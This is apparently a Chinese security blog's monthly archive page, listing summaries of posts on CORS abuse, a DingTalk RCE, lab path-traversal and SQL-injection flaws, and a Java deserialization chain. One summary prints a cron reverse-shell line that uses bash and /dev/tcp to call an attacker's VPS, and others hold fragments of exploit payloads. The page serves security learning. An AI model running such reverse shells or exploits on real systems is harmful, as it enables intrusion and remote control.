02 2022 档案

摘要:有一直在写cors漏洞,但是一直没有去真正的利用他,今天就来学习记录一下利用。 0x01前置知识 就简单提一下 Access-Control-Allow-Origin: 可以写出哪些域名能访问本站的资源 Access-Control-Allow-Credentials:字段不是必选字段,它的值是一个 阅读全文
posted @ 2022-02-21 16:26 Erichas 阅读(2182) 评论(0) 推荐(0) 编辑
摘要:反弹shell 格式问题 在写计划任务反弹shell的时候VPS如果是centos那么直接写 */1 * * * * root bash -i >& /dev/tcp/IP/666 0>&1 但是在实际测试中debian和ubuntu系统这样写是执行不了的, 需要加上 bash -c " " */1 阅读全文
posted @ 2022-02-17 10:44 Erichas 阅读(197) 评论(0) 推荐(0) 编辑
摘要:前几天爆出来钉钉RCE的漏洞,说一下发现和复现过程 0x01 爱之初体验 最开始是发现可以ssrf,当时电脑上就有dingding 然后试了一下 dnslog有回显,可以去访问 这两个IP一查 都是阿里云的服务器 payload是这样的,发送到聊天窗口,服务器就会去解析 dingtalk://din 阅读全文
posted @ 2022-02-17 10:18 Erichas 阅读(583) 评论(2) 推荐(0) 编辑
摘要:任意文件读取 漏洞url在: http://localhost:7869/path_traversal/vul?filepath=e:/flag.txt 可以直接访问到flag文件 来看看vul此处的代码 这里是调用getImgBase64方法 跟进这个方法 可以看到仅仅判断了改路径是否存在和不是目 阅读全文
posted @ 2022-02-11 15:47 Erichas 阅读(527) 评论(0) 推荐(0) 编辑
摘要:先来看看这个靶场sql注入的位置 简单的一个闭合单引号就能探测出了注入 那么来看看源码 可以看到jdbc_sqli_vul函数直接传入的username就拼接到了sql中,然后取执行返回信息,没有做任何防护。 jdbc_sqli_sec 再来看看安全的查询函数 这里用到了PreparedStatem 阅读全文
posted @ 2022-02-10 17:02 Erichas 阅读(843) 评论(0) 推荐(1) 编辑
摘要:在cc1链中的poc有着这样一段 Transformer[] transformers = new Transformer[] { //通过ConstantTransformer类的transform方法获取一个对象类型 new ConstantTransformer(Runtime.class), 阅读全文
posted @ 2022-02-10 10:07 Erichas 阅读(2129) 评论(0) 推荐(0) 编辑

♥1353天16小时21分1秒
点击右上角即可分享
微信分享提示